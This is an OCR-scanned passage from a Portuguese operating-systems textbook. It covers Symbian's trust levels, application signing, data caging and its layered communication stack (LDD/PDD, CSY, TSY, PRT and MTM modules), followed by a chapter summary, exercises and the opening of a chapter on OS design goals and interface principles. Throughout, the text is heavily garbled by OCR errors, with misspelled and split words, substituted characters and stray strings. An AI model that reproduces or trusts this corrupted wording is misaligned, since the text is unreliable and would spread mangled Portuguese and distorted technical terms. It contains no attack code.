nudeo a apłicaęao sempre que ela for executada + 

O di agrarna da Figura 12.3 de monstra as rclaęoes de 
confianęa na versao 9 do Symbian, Notę que ha varios nf~ 
vcis de confianęa no sistema. Algumas apiicaęoes nao aces¬ 
sam recursos do sistcma e, por isso, nao precisam de assina- 
Uiras. Um exemplo disso seria mm apłicaęao simples que 
apenas mostra algo na tela. Essas apiicaęoes nao sao confia- 
veis, mas nao precisam sen O nivel de confianęa seguinte e 
composto pelas apiicaęoes assinadas do mvel do usuario e 
a elas sao garantidas apenas as capacidades das quais pre¬ 
cisam. No terceiro mVel de confianęa esta o os servidores 
do sistcma. Da mesma forma que as apiicaęoes do mVd do 
usuario, esses scrvidorcs precisam apenas de cert as capa- 
cidades para execuiar suas funęoes. Em urna arąuitetura 
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I Figura 12.3 O sistema Symbian usa relagoes de confianga para implementar a seguranga. 


de microniideo como a do Symbian, esses servidores sao 
cxecuiados no invd do usuario e iraiados como aplicaęoes 
dcsse mvel Finalmente, ha uma classe de programas que 
reąuer confianęa toial do sistema, Esse grypo dc programas 
tem todas as capacitiades dc mutiar o sistema e ć feito de 
cod i go dc rnkleo. 

Hd varios aspectos nesse sistema qnc podem pare- 
cer qucstiondvcis. For excmplo, essc processo daborado 
c rncsmo necessario (espccialmente quando cusia algum 
dinheiro)? A rcsposta e 'sim'; o sistema de assinaturas do 
Symbian isenta os usuarios da verificaęao da imegridade 
dos programas e dc fato os verifica, Essc processo pode 
parecer dificultar o desenvo!vimento: cada testc cm hard¬ 
ware rcal reąuer uma nov-a assinatura para o paeotc dc 
instalaęao? O Symbian reconhece uma assinauira espedal 
para de$envolvedorcs. Um deseńvolvedor pode conseguir 
um certifitado de assinauira digital que tem validade (nor¬ 
malnienie scis rneses) c e especifico para um determmado 
smartphonc* Ele pode, enlao, criarseus próprios pacoies de 
insialaęao com o cerlifkado digital, 

Alem da fundonalidade de portei.ro na versao 9 y o 
Symbian tambem emprega algo cha mado aprisionamen- 
to de dados, que organiza os dados em diretórios e$pe- 
ciTicos, O código executavei só existe cm um diretório 
por exemplo, no diretório que pode ser escrito apenas pelo 
software de insialaęao da aplicaęao, Fora isso, os dados só 
podem ser gravados pcla aplicaęao em um diretório, que 
e privado e nao pode ser acessado por outros programas. 


12,8,11 Infraestrutura basica 

A infraestrutura de comunicaęao do Symbian bascia- 
-se em componentes simples. Uma forma bem generica 
dessa infraestrutura e mostrada na Figura 12,4. Considere 
esse diagrama como porno de partida para um modelo or- 
ganizacional. Na base da pil ha esta um dispositivo fisico, 
conecrado de alguma forma ao computador. Ele pode ser 
um modem de telefonc móvel ou um transmissor de radio 
Bluctootii embarcado em um comunicador; como nao faz 
dlEercnęa, vamos trata-lo como uma unidadc abstrata que 
responde a os comandos do software de forma apropriada. 

O próximo nfvel, e o primeiro que nos interessa, e o 
nfvel de drivers de dispositivos. Ja apomamos as estml Li¬ 
ra s dos drivers de disposirivos; o software nesse nivel esta 



12.8 


Comunicaęao no Symbian 


O Symbian e projetado com um criterio especifico e 
pode ser caracterizado como um sistema operacional volta- 
do a comunicaęao diredonada por evento, usando relaęóes 
cliente/servidor e configu raęoes baseadas em pilhas. 



HARD¬ 

WARE 


I Figura 12*4 A comunicaęao no sistema Symbian e orientada 
por uma estrutura de blocos, 
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interessado em irabalhar diretamente com o hardware por 
meio das estruluras LDD e PDD. Ele e esperffico, e qual- 
quer hardware novo rcquer imi novo software de driver de 
dispositivo para fazer a interface com ele. Drivers diferentes 
sao nccessarios para unidades de hardware distintas, mas 
todos dcvcm implcmcntar a mesma interface com as cama- 
das supcriorcs. A camada dc implementaęao de protocolo 
espcra a mesma interface, indcpendcntemente da unidade 
de hardware milizada, 

A próxima camada e a de implementaęao de protoco- 
lo r que contem as implcmemaęoes de protocolos as quais 
o Symbian oferccc suponc. Elas assumem urna interface 
do drivcr dc dispositivo com a camada inferior c fomcccm 
urna interface imifkada com a camada dc aplicaęao a ci ma, 
Essa camada implementa os conjuntos dc protocolos TCP/ 
IP e Blueiooih, por exe rupio, bem como otiiros protocolos, 

Finalmente, a camada de aplicaęao e a mais alta. Ela 
contem a aplicaęao quc vai utilizar a infraestrutiira de co- 
municaęao c quc nao sabc mnito sobie a implementaęao 
da comunicaęao. Todavia, cła fazo trabalho ncccssariopara 
infonnar ao sistema opcracional quais dispositivos vai usar. 
Quando os drivcrs estao no lugar, a aplicaęao nao os acessa 
diretamente, mas millza as A Pis da camada de implemen¬ 
taęao de protocolo para comandar os disposUivos reais, 

_ 12.8.21 Uma visao mais próxima da 

infraestrutura 

Uma visao mais detalhada das camadas da infraestru- 
tura dc comtinicaęao do Symbian e mosirada na Figura 
12.5. Essc diagrama e bascado no modelo generico da Figu¬ 
ra 12.4, no qual os blocos foram subdivididos em unidades 
operadonais que descrcvem as utilizadas no Symbian. 

O dispositivo flsico 

Primeiro, observe que o dispositivo nao foi aherado. 
Como dissemos anteriormente, o Symbian nao rem con- 
trok sobre o hardware. Dessa forma, ele a com o da os dis- 
positivos de hardware por meio de seu projeto dc API cm 
ca mad as, seni espcrificar como o hardware c projetado e 
construfdo. Isso c, na vcrdade, uma vamagcm para o Sym¬ 
bian e sens deseń volvedorcs, Ol ha udo o hardware como 
unia unidadc abstrala e projetando a comunicaęao em toi ¬ 
no dessa abstraęao, eles garantiram que o Symbian conse- 
guisse tratar a ampla variedade de dispositivos atualmente 
disponweis e a com oda r novos dispositivos no futuro. 

A camada do driver de d!spo$itivo 

A camada do drivcr de dispositivo foi subdividida em 
outras duas camadas na Figura 12.5, Como menciona- 
mos anteriormente, a camada PDD faz a interface direta 
com o dispositivo ffsico por meio de uma porta espeafica 
no hardware. A camada LDD faz a interface com a ca¬ 
mada de implementaęao de protocolo e implementa as 
polfticas do Symbian relacionadas ao dispositivo. Essas 


polfticas incluem buffer de entrada e saida, mecanismcs de 
interrupęao e controle de fluxo. 

A camada da implementaęao de protocoio 

Varias snbeamadas foram adidonadas a camada de im- 
plementaęao de protocolo na Figura 12 5. Quatro tipos de 
mód u los sao usados para implementaęao de protocolo; eles 
sao listados a seguir: 

1, Módulos CSY: o nfvel mais baixo da camada dc 
implementaęao de protocolo c o módulo dc scrvi- 
dores de comunicaęao, ou CSY Urn módulo CSY sc 
comunica diretamente com o hardware por meio da 
poręao PDD do drivcr do dispositwo, implcmenian- 
do os varios aspcctos de baixo nfvcl dos protoco- 
los. Por exemplo, um protocolo pode solicitar uma 
transferćncia de dados brntos para o dispositivo dc 
hardware ou pode esperifkar uma transferencia 
com buffer de 7 ou S bits. Esses modos seriam trata- 
dos pclo módulo CSY. 

2, Módulos TSY: a telefonia comprecnde grandę parte 
da infraestruiura de comunicaęao, e módulos espe- 
ciais sao usados em sua implementaęao. Os módu¬ 
los dc servidores de telefonia (TSY) implemenlam as 
funcionalidades da telefonia. Os TSYs basicos podem 
dar suporte a funęoes de telefonia padrao, como rea- 
lizar e finalizar cha i nada s, em um amplo conjunto 
de dispositivos de hardware. TSYs mais avanęados 
podem dar suporte a funęoes mais aprimoradas dos 
telefones, como a funcionalidade GSM. 

3, Módulos PRT: os módulos prińcipais usados na 
implementaęao de protocolo sao os módulos de pro- 


Aplicaęao 


Código no lado do usuśrio 



Módulo de comumcaęao CSY (aplicaęao) 



Im plementaęao de protocolo 
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I Figura 12.5 Ą estru! ura de comunicaęSo no Symbian tern 
um grandę conjunto de caracteristicas. 
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tocolo, ol: módulos PRT. Eles sao usados pelos sem- 
dores para implememar os protocolos* Urn servidor 
cria uma imtancia de urn modulo PRT quando pre- 
ten de usar o protocolo* 0 eon junto de protocolos 
TCP/LR por exemplo, e implementacjo pdo modulo 
TCPIRPRT. Os protocolos de Bluetooth sao imple- 
mentados pdo modulo BT*PRT* 

4. MTMs: como o Symbian foi projetado espctifica- 
menie para o envio de mensagens, su a arąuiteiura 
cria urn mecanismo para tratar mensagens de lodos 
os tipos. Esses iraiadores de mensagens sao cha ma- 
dos de módulos de lipos de mensagem, ot] MTMs. 
Ha varios aspectos no traiamento de mensagens e os 
MTMs devem implememar cada nm dcl es* MTMs 
de i mer lace com os usuarios devem implememar as 
varias lomias que os usuarios irao ver e mantpular 
as mensagens, dcsdc como o usuario Ic uma men¬ 
sagem ale a forma como cle sera informado de seu 
processo dc envio. MTMs do lado do cli en te trata m 
de endcreęamento, criaęao e respostas as mensa¬ 
gens, enąuanto os MTMs do lado do serndor devem 
implememar a manipulaęao de mensagens orienta- 
da a servtdores, incluindo manipulaęao de pastas e 
manipulaęao espeefika de mensagens. 

Esses módulos utilizarn-se uns dos outros de varias 
form as, dependeudo do lipo de comumeaęao utilizado. As 
implemctuaędes de protocolo utilizando Bluetooth, por 
exemplo, vao usar apenas módulos PRT sohre os drivers 
de dispositivos. Alguns protocolos TrDA lambem agirao 
assiin. Implemenlaęoes dc TCP/IP que usam PPP uliliza- 
rao módulos PRT TSY e CSY, Implemeniaęóes de TCP/IP 
sem PPP gml menie na o milizarn o modulo TSY nem o 
CSY, mas ligam o modulo PRT dire ta menie ao driver de 
dispositivo de redc. 

Modularidade de infraestrutura 

A modularidade desse modele bascado cm pilha e util 
aos implemcmadores, A ąualidadc dc abstraęao do projeto 
cm camadas lica evideme nos exemplos que acabamos de 
vee Considere tima implementaęao de TCP/IP em pilha. 
Uma conexao PPP pode ir diretamertie a um modulo CSY 
ou escolher uma implementaęao GSM cni TSY de modem 
normal, ou que, em comrapartida, aeontece pelo modulo 
CSY. Quando, no futuro, surgirem novas tecnologias de te¬ 
lefonia, essa estrutura ainda vai funeionar e predsaremos 
apenas adictonar um modulo TSY pora a nova implemen¬ 
taęao dc telefonia. Alćm disso, ajustar a pilha de protocolo 
TCP/IP nao rcquer altcrar nenhum dos módulos dos quais 
da dependc; basta qnc ajustemoso modulo PRT dc TCP/IPe 
dcixemos os dema is. Essa vasta modularidade signifka que 
novos códigos sao facilmenie inseridos na infraesirulura, 
códigos amigos sao facil menie descartados e códigos exis- 
tentes podem ser modifieados sem abalar o sistema inteiro 
ou necessitar de rei ustalaęoes. 


Finalmente, a Figura 12.5 adicionou subcainadas a ca- 
mada dc aplicaęao. Alguns módulos CSY sao usados pelas 
aplicaęóes para fazerem interface com módulos de proto¬ 
colos nas implemeniaęóes de protocolo. Ainda que seja 
possfvd considerar essa caractenstica como parte da im¬ 
plementaęao de protocolo, c mais claro pensar que des dao 
assistcncia as aplicaęóes. Um exemp!o disso seria uma apli¬ 
caęao que usa mfravermdho para ciwiar mensagens S.MS 
a partir de um telefone móvd. Essa aplicaęao usaria um 
modulo CSY IRCOMM no lado da aplicaęao, que usa unia 
implementaęao de SMS embutida em uma ca ma da de im¬ 
plementaęao de protocolo. Mais uma vez, a modularidade 
de todo o processo e uma grandę vamagom para aplicaęóes 
que precisam focar aąuilo que fazem md hor, e nao proces- 
sos de comunicaęao. 


■w Resumo _ 

O Symbian foi projetado como um sistema opera do na 1 
oriemado a objetos para plataformas de smartphones. Ele 
tern um projeto de micronudeo, que tern em seu centro 
um nanonudeo, implementando apenas as funęoes mais 
basicas e rapidas do nucleo, 0 sistema usa uma arąuitetu- 
ra clieme/servidor que coordcna o accsso aos recursos de 
sistema com semdores no espaęo do usuario, Ainda que 
projetado para os smartphones, o Symbian apresenta mui- 
tas dascaractensticas de um sistema de uso geral; processos 
c threads, gerenriamento de memória, su porte a sistemas 
de arquivos e uma rica infraestrutura de comunicaęao. O 
sistema Symbian implementa algumas funęoes singulares; 
por exemplo, objetos ativos toru ani a espera por eventos 
externos muito mais eficiente; a falta de niemória virtual 
torna o gerenciamemo de memória mais desaftador e o su- 
porte par a a orientaęao a objetos nos drivers de dispositivo 
usa um modelo ab strat o de duas camadas* 


Problemas 


1. Para cada um dos exemplos de servięos a seguir, descreva 
se ele deveria ser considerado uma operaęao no espaęo 
do nucleo ou no espaęo do usuario (por exeniplo, em um 
seryidor do sistema), para um sistema operacional basea- 
do em micronudeo como o Symbian: 

1. Agc n d ar u m th rca d pa ra excc u ęao 

2. Imprimir um doeumemo 

3. Responder a uma eon suita sobre descoberta de um 
disposUWo Bhictooth 

4. Ge ren dar o acesso de threads a tela 

5. Tocar um som quando unia mensagem lor recebida 

ć. Interrompcr a execuęao para a ten der a uma chama* 
da tclefónica 

2 . Listę tres melhoras na efidcncia i razi da s pclo projeto de 
micronudeo. 
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3. Listc trcs problemat dc cficicnda irazidos pclo projeto dc 
micronucleo. 

4. O Symbian divide seu projeto de nudeo cm duas cama- 
das: o nanonucleo c o nudeo desse sistema operadonal. 
Semęos como gerenda niemo d Ina mi co dc memória fo- 
ram considerados muito complicadoś para o nanonucleo. 
Descreva os componemes complicados do gerendamemo 
di na mi co de memória e explique por ąue eles podem nao 
fundo nar no nanonucleo. 

5* Discmimos os objeios aiivos como urna forma de lornar o 
processamcnto dc E/Ś mais cfidcntc. Vocc adia que unia 
aplicaęno poderia usar multiphs objeios ativos ao mesmo 


tempo? Como o sistema reagiria quando mii U i pl os even- 
tos de E/S soliriiassem unia aęao? 

G, Aseguranęa no Symbianconccmra-sena instaiaęaocna assi- 
natura dc aplicaędcs? lssoć o ba stanic? ćpossfvcl unia situa- 
ęao na qual urna apJicaęao pode ser arniażenada para exe- 
cuęao sem ter sido instalada? (Dka\ pense em todos os pos- 
sfvcis pornos dc emrada dedados cm um tclefonc mćvcl.) 

7. No Symbian, a proteęao de recursos oompartilhados ba- 
seada cm servidores e muito usada. Listę ires vantngens 
desse lipo de coordcnaęao dc reeursos em um ambierne 
de micronudeo. Reflila sobre como cada uma dessas van- 
tagens pode afetar urna arąuitemra dc nudeo diferente. 






Capitulo 



Projeto de sistemas operacionais 


Nos 12 capftulos anteriores, abordamos u ma serie dc 
fundamciitos c vimos muitos conceitos c cxemplos rcla- 
donados a os sistemas operacionais. Mas o estudo dos sis- 
lemas operacionais existentes e diferente do projeto de urn 
novo sistema operadonal. Nesic capitulo, cxaminaremo$ 
rapidamente algumas das questoes e ponderacoes que os 
projeiisias de sistemas operacionais dcvem levar ein consi- 
dcraęao duramc o projeto c a implcmentaęac dc urn novo 
sistema operacional. 

Existe um certo foldore sobre o que e bom ou mim 
em torno da comunidadc de sistemas operacionais, cm- 
bora surpreendentemente pouco tenha sido cscrito sobre 
o tema. TaWez o livro inais importame seja o dassico de 
Fred Brooks (1975 ), cha mado The mythkal man month, no 
qual de relata suas experiencias no projeto e na imple¬ 
mentacjo do OS/360 da JBM. A edięao de 20 u aniversatio 
revisa parte da materia e adidona quatro capftulos novos 
(Brooks, 1995). 

Tres artigos classicos sobre o projeto de sistemas ope- 
radonais sao; "Hints for Computer system design* (Lamp- 
son, 19S4), ' J On building systems that will fail" (Corbató, 
1991) e "End-to-end arguments in system design* (Saltzer 
ci al. r 1984). Como o livro dc Brooks, esses trćs artigos tern 
sobrevivido exiremamente bem aos a nos; nmitos de seus 
pensa mcm os sao yaikios ainda boje como ąuando (oram 
publicados pela primcira vez. 

Este captudo esboęa essas idcias, somadas a u ma cxpe- 
rienda pessoal como projetista ou coprojciista dc tres sis¬ 
temas: Amoeba (Tanenbaum et al, 1990), MINIX (Tanen- 
bauni e WoodhulL 1997) e Globe (Van Steen et aL, 1999a). 
Visto que nao ha nenhitm consenso entre os projetistas dc 
sistemas operacionais sobre a melhor maneira de projetar 
um slstema operacional, este capitulo sera, assim, mais 
pessoal especulativo e indiibUavelmente mais controverso 
que os anteriores. 


13.1 


A natureza do problema de 
projeto 


O projeto do slstema operacional e mais um projeto de 
engenharia do qite urna cicncia exata. Ć iriuito mais diffcil 
estabclecer objęli vos claros e alcanęados. Vamos abordar 
inirialmente esses pornos. 


13.1.11 0bjetivo$ 

Para projetar um sistema operacional bem-sucedido, 
os projetistas precisam ter uma ideia clara do qtte querem. 
A falta de um objetivo torna muito mais diffcil tomar deci- 
soes. Para deixar essa questao mais clara, vamos partir de 
duas linguagens dc programaęao: PL/I e C. A PL/i fol projc- 
lada pela IBM na dćcada de 1960 porque era uma chatea- 
ęao fornecer suportc tanio para o FORTRAN quanto para o 
COBOL e constrangcdor ouvir os acadćmicos dizerem, nos 
bastidores, quc o Algol era md bor que os dois. Assim, um 
comile foi criado para produzir uma linguagem que deveria 
satisfazer tudo para todos: a PL/I. Ela tinha um pouqtiinho 
do FORTRAN, do COBOL e do Algol. Ela fracassou porque 
nao tinha uma visao unificada: era simplesmente uma co- 
leęao de caracterfsticas em situaęao de disputa uma com as 
outras e muito sobrecarregada para que fosse compllada e 
iiiidalizada efldentemente. 

Agora considere C. Ela fot projetada por uma pessoa 
(Demiis Ritcliie) com utn propósito (programaęao de sis¬ 
temas). Foi um grandę sucesso, pois Ritcliie sabia o que 
queria e o que nao ąueria. Como conseąuenda, ela ainda 
e amplamente usada, mesmo decadas após sita aparięao. 
Uma clara visao do que voce quer e cruciaL 

O que os projetistas de sistemas operacionais querem? 
Obviamente isso varia dc um sistema para outro, assim 
como de sistemas embareados para sistemas semdores. 
Contudo, para sistemas operacionais de propósito geral 
quatro itens principais devem ser considerados: 

1. Definir abstraęoes. 

2. Fornecer operaęoes priinitivas. 

3. Garantir isolamento, 

4. Gerenciar o hardware. 

Cada um desses itens sera discuttdo a seguir. 

A tarefa mais importante — lalvez a mais diffcil — de 
um sistema operacional e definir as abstraęoes corretanien¬ 
ie. Algumas delas, como processos, espaęos de endereęa- 
mento e arquivos, tern sido usadas durarue tanio tempo 
que parecem óbvias. Outras, como threads, sao mais rc- 
centes e menos desenvolvidas. Por exemplo J se um pro- 
cesso multithread, com um thread bloqueado esperando 
uma entrada do tedado, cria um novo processo, esse novo 
pro cesso tambem tera um thread esperando uma entrada 
do tedado? Outras abstraęoes sao relacionadas a sineroni- 






Sn#W66G 


zaęao, sinais, modelo de memória, modelagem de emrada 
e saida e muitas outras areas. 

Cada lima das abstracoes pode ser ins lancia da na forma 
de estruiuras dc dados concrctas. Os usuarios podcm criar 
proces sos, arqmvo$, semafor 05 etc As operaęoes primiii- 
vas manipulam essas esiruturas de dados. Por exemplo, os 
usuarios podem ler e escrever em arquivos. As operaęoes 
primitivas sao implementadas na forma de chamadas de 
sistema. Do ponto de vista do usuario, o co raca o do siste¬ 
ma operacional e formado por abstraęoes e operaęoes sobre 
das, disponfreis por mcio dc chamadas de sistema. 

Visio t]ue muhiplos usuarios podem usar nm compu- 
tador ao mesmo tempo, o sisiema operacional predsa for- 
necer mecanismos para mantedos separados. U 111 usuario 
nao pode interferir em outro. O conceito de prccesso e am- 
plamente aphcado para agrupar recursos por questóes de 
proteęao. Arquivos e out ras estruturas de dados geraimen- 
te sao protegidos tambem. A ga rant i a de que ca da usuano 
possa executar somcntc operaęoes autonzadas sobre dados 
autorizados ć urn objetivo essencial do projeto dc sistemas. 
Conludo, os usuarios tambem quercm compartilhar dados 
e recursos, de modo que o isolamento devc ser seletivo e 
sob o controle do usuano. Isso e muito mais diffdl. 0 pro- 
grama de e-maij nao deveria conseguir impactar severa- 
meme o navegador. Mesmo quando ha urn unico usuario, 
diferentes processos precisatn ser isolados. 

Fortemente relacionada a essa ąuestao esta a neccssi- 
dade de isolar falhas. Se alguma parte do sisLema faiha — 
muito provave]mentc urn proccsso do usuario esta nao 
devc ser eapaz de a na star o resto do sistema junto tom da. 
O projeto do sistema tern de garamir que as varias partes 
tambem sejam bem tsoladas umas das oulras. Idealmente, 
partes do sistema operacional tambem devcm ser isoladas 
u mas das outras para permitir falhas independemes. 

Por firn, o sistema operacional tem dc gerenciar o hard¬ 
ware, Em panien lar, dc deve cuklar dc todos os circuitos 
dc baixo nfvel, como controladores de inierrupęao e de 
barraniemo. Ele tambem prccisa forncccr um modelo quc 
permita quc os drivcrs dc dispositivos gerendem os maio- 
res dispositivos dc entrada c saida, como discos, impresso- 
ras e monitor. 

_ 13.1.21 Por que e diffctl projetar um 

sistema operacional? 

A lei dc Moore diz que o hardware dc um computa- 
dor c melhorado por um fator dc 100 a cada decada. Mas 
nao existe nenhuma 3ci que diga que o sistema operacio- 
nal c melhorado por um fator de 100 a cada decada, ou 
mesmo que tenha alguma mclhora. Na rcalidade, pode 
aeontecer que alguns deles sejam piores em cer las ques- 
tóes centrais {como a conliabilidade) do que a versao 7 do 
UNix era na decada de 1970, 

Por quc? A inercia e o desejo de compatibilidade com 
sistemas mais antigos muitas vczes levam a maior parte da 


Capitulo Projeto de sistemas operacionais SM 

culpa, e a faiha em aderir aos bons princfpios de projeto e 
tambem unia razao. Entretanto, ha mais a ser dito. De certa 
maneira, os sistemas operacionais sao fundamcnia]menie 
diferentes dos apłitativos peąuenos vendidos nas lojas de 
computadorcs por US$ 49, Vamos obscrvar oito das qucs- 
tócs que tonią m o projeto do sistema operacional muito 
mais diffdl do que o projeto de um aplicailvo. 

Primcira: os sistemas operadonais tem se tornado pro- 
gra mas ■extremamente extensos. Nenhuma pessoa pode 
semar-sc diante de um PC c domina r um sistema opera no¬ 
na 1 serio cm poucos ineses. Todas as versoes atuais do UNIX 
excedem tres milhoes de linhas de código; o Windows Visia 
possui mais dc cinco milhoes de linhas de código no modo 
nu cle o {e mais de 70 milhoes de linhas no total), Ninguem 
e capaz de compreender de tres a cinco milhoes de linhas 
de código, quanto mais 70 milhoes, Quando voce tem um 
produto que nenhum dos projetistas pode compreender 
completamente, nao dcve siirprecnder o fato de os resulta- 
dos esta re m muitas vezes distantes da soluęao ótirna. 

Os sistemas operadonais nao sao os sistemas mais 
cojnplcxos que existem. As aeronaves de transportc dc 
passageiros, por exeniplo, sao muito mais complicadas, 
mas se dividcm melhor em suhsistemas isolados. As pes- 
soas que projetam os banheiros dessas aeronaves nao se 
preociipam com o sistema de radares. Os dois subsistemas 
nao imeragem muito entre sL Em um sistema operacional, 
o sistema dc arquivos muitas vezes inlerage com o sistema 
de memória em situaęóes inesperadas e imprevisiVeis. 

Segunda: os sistemas operacionais tem de lidar com a 
concorrencia, Existem muhiplos usuarios e dispositivos dc 
entrada e safda, todos attvos de urna só vez. O gerencia- 
mento da concorrencia e inerememente muito mais diffcil 
do quc o gerendamemo de unia unica aiivitlade sequen- 
cial. As condięóes de corrida e de impasses sao apenas dois 
dos problemas quc surgern. 

Terceira: os sistemas operacionais Udam com usuarios 
potencialmente hostis — usuarios que querem interferir 
no fiincionamemo do sistema ou fazer coisas proibidas, 
como roubar os arquivos dos outros ttsuarios. O sistema 
operacional predsa lomar medidas para evitar que esses 
usuarios se comportem inadequadamentt\ Os progranias 
de processamento de tcxtos c cditorcs de imagens nao tem 
esse próbie ma, 

Quarta; desconsiderando o falo de que nem todos os 
usuarios confiam uns nos outros, muitos usuarios querem 
compartilhar informaęoes e recursos com outros usuarios 
seledonados. O sistema operacional tem de tornar isso pos- 
sfvel, mas de modo quc os usuarios m a 1-i me ncio na dos nao 
possani interferir. Novamente, os aplicativos nao encaram 
csse lipo dc desa fi o. 

Quinta: os sistemas operadonais vivem por um longo 
tempo. O UNIX vem sendo usado ha um quarto dc scculo; o 
Windows existe ha mais de urna decada e nao mostra sinais 
de que va desaparecer. Conscqucnteinente, os projetistas 
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devem pensar como o hardware e as aplicaęoes podem liiu- 
dar no Futuro distante e como eles devem se preparar para 
isso, Os sistemas direcionados rnuitointcnsa menie para u ma 
visao espedfica do mundo geralmente logo ficam para tras. 

Sc sta: os projetistas de sistemas operacionais realnien¬ 
ie nao Lem urna boa ideia de como sens sistemas serao usa- 
dos, de modo que eles predsam desenvolve-los visando a 
urna consideravel generalidade. Nem o UN1X nem o Win¬ 
dows foram projetados com c-mail ou corn navegadores 
de Web em menie — apesar de que muitos computadores 
que executam esses sistemas fazem poueo mais do que isso. 
Ninguem diz a urn projetista de navio para construir um 
navio sem espedfkar se o que se quer e um navio pesqud- 
io r um navio de cruzeiro ou um encouraęado. Men os ainda 
muda-se de ideia depois do produto pronto. 

Set ima: os sistemas operacionais niodemos em gcral 
sao projetados para serem portateis, o que significa que tern 
de executar em nuihiplas plataformas de hardware. Eles 
tambem devem fmidonar com cen te nas, ialvez milhares, 
de dispositivos de enirada e de salda, e todos sao projetados 
independentemente, sem qualquer relaęao uns com os on- 
tros. Um exemplo de um problema gerado por essa diver- 
sificaęao e a necessidade que um sistema operadonal tern 
de exccufar tanto em maquinas que a dola m a ord cm linie- 
-endian dc bytes em urna paiavra quanto em maquinas que 
adoiam a ordom big-mdian. Um segundo exemplo era vislo 
constamementc no jMS-DOS quando os usuarios tcntavam 
instalar, por exemplo, urna płaca dc som c um modem que 
usavam as mes mas portas de enirada e de salda ou linhas 
de reąuisięao de imerrupęao. Alguns poucos programas 
alem dos sistemas operacionais precisain tratar esses pro- 
blemas causados pdas partes conflitames do hardware. 

Oitava, ultima cm nossa lisia: a frequente necessidade 
de maniera compatibilldade com algumsistema operado¬ 
nal antcrior, Esse sistema pode ter restrięoes nos tamanhos 
das palavras, em nomcs de arquivos ou em outros aspec- 
tos que os projetistas atualmcnte considcram obsoletos, mas 
que estao atrelados a esses sistemas anligos. E o inesmo que 
transformat u ma fabrica a firn de produzir os carros dopró- 
ximo ano em vez dos carros desie ano, mas cominuando a 
produzir os carros desie ano a loda capaddade. 


13.2 


Projeto de interface 


Deve esiar ciaro neste memento que a escrita de um 
sistema operadonal moderno nao e facil. iMas, por onde 
comeęar? Provavelmente F o melhor e pensar nas interfaces 
que ele dcve fornecer. Um sistema operadonal fornece um 
conjunto de abstraęoes, implcmentadas principalmente por 
tipos de da dos (poi cxcmplo, arquivos) e operaędes sobre 
des (por exemplo, nead). Jtmtos, esses servięo$ formam a 
imerface para sens usuarios. Notę que nesse comexto os 
usuarios do sistema operadonal sao program a dor es que 
escrevcm códigos que usam chama das de sistema, nao pes- 
soas que executam programas aplicaiivos. 


Alem da interface principal de chamadas de sistema, 
a maioria dos sistemas operacionais tern interfaces adicio- 
nais. Por exempio, alguns programadores predsam escre- 
ver drivcrs de disposiiivos para inscri-los deniro do sistema 
operadonal. Esses drivers enxergani certas caraaerfsUcas 
e podem realizar deierounadas chamadas de procedimen- 
to. Essas caractensticas e chamadas tambem dcli nem u ma 
interface, mas esta e muito diferente daąuela que os pro¬ 
gramadores de aplicatwos eiixergarn, Todas essas interfaces 
devem ser cuidadosamente projetadas se o objetivo 6 um 
sistema bem-sucedido. 

13.2.11 Principios norteadores 

Existem principios capazes de guiar o projeto de inter¬ 
face? Acrediiamas que sini. Em linhas gerais, sao: simpli- 
cidade, completude e capaddade para ser implememado 
eficientemente. 

Prindpio 1: simptlcidade 

Urna interface simpies e mais fadl de compreender 
e impiementar de uma maneira livre de erros. Todos os 
projetistas de sistemas deveriam memorizar esta famosa 
citaęao do pi one i ro aviador frances e escritor Antoine de 
St.-Exupery: 

A perfeiędo i alcanęada nao ąuando nao ha mais o ą ue 
acrescentan mas sim qinmdo nao hd mais o que tkań 

Esse princlpio diz que menos e melhor do que mais, ao 
menos para o sistema operadonaL Uma outra maneira de 
di zer isso ć o princlpio KISS: "Mantenha-o simpies, estupi- 
do' (do inglcs" Keep n simple , slLipid''). 

Prindpio 2: completude 

Obviamente, a interface deve permilir a realizaęao de 
qua]quer coisa que os usuarios ąueiram fazer, isto e, ela 
deve ser completa. Isso nos leva a uma outra citaęao famo¬ 
sa, agora de Albert Einstein: 

Tndo deve ser o mais simpies possml, mas nao mais sim- 
pks que isso , 

Em out ras palavras, o sistema operadonal dcve fazer 
exatamente o quc ć necessario que ele faęa e mais nada. Sc 
os usuarios predsam armazenar da dos, ele devc fornecer 
algum mecanismo para armazenar dados. Sc os usuarios 
predsam comunicar-se uns com os outros, o sistema ope¬ 
radonal tein de fornecer um mecanismo de comimicaęao, 
e assim por dianie. Em sua palestra de 1991 durante o 
Tu ring Award, Fernando Garbato, um dos projetistas do 
CTSS e do MULTICS, combinou os conceitos dc simplici- 
dade e completude e disse: 

Primetro, i importante enfaimr o valor da simplkidade 
e da elepamia, jd que a compkxidade tern uma maneira 
de compor difiaddades e, como temos visto, criando erm . 
Minka deftnipie de ekgamia i a realizaędo de uma dada 
fundonalidade com um minima de mecanismo e um md- 
ximo de clareza, 










A ideia printipal aqui e o mm im o de mecmismo. Em ou- 
tr as palavras, ca da caractehstica, funęao on chama Ja de 
sistema deve arcar com scu próprio pcśo, Elas devem fa- 
zer algo e faze-lo benfeito. Quando um membro da equipe 
de projeto propóe estender u ma chamada de sisiema ou 
adicionar alg urna nova cara cteris Lica, os outros devem pcr- 
guntar se algo tcrrfyel ocorrera se ignorarmos essa ques- 
tao, Sc a rcsposta ć: "Nao, mas algum dla alguem podera 
descobrir que essa caractehstica e utilh coloque-a cm u ma 
biblioteca no ntvel do usuario, nao no mvel do sisiema 
operadonal, ahida que ela fiquc lenta. Nem lodas as ca- 
ractcristicas prcdsam ser mais rapidas do quc urna bała cm 
alta vdocidade. O objetivo e preservar aquilo que Corbató 
clianioLi de minimo de mecanismo. 

Vamos agora considerar resumidamcme dois exem- 
plos de min ha própria experiencia: o MIN1X (Tanenbaum 
e WoodhulI, 2006) e o Amoeba (Tanenbaum et al. r 1990). 
Fara todas as inlenęoes e propósitos, MINIX tern tres cha- 
madas de sistema: send, receive c sendrec. O sisiema e estru- 
tu rado como urna coleęao de processos, com o gerenciador 
de memória, o sistema de arqmvos e ca da driver de dispo- 
sitivo, como um processo cscalonado sępa rada men tc. Em 
urna analiscpreliminar, tudo o quc o niiclco fazć cscalonar 
processos e iratar a troca de mensagens entre eles. Conse- 
ąuentemcmc, somente duas chamadas de sistema sao nc- 
cessarias; send, para etwiar u ma mensa gem, e receive, para 
re ceber u ma mensagem. A lerceira chamada, sendrec, e 
simplesmente urna otimizaęao, por ąucslocs dc eficiencia, 
para perm i tir que unia mensagem seja enviada e a resposta 
seja reąttisUada usando somente urna interrupęao do mi¬ 
elec. Tudo o mais e feito requisiiando algum otarć processo 
(por exemplo, o processo do sistema de arquivos ou o dri- 
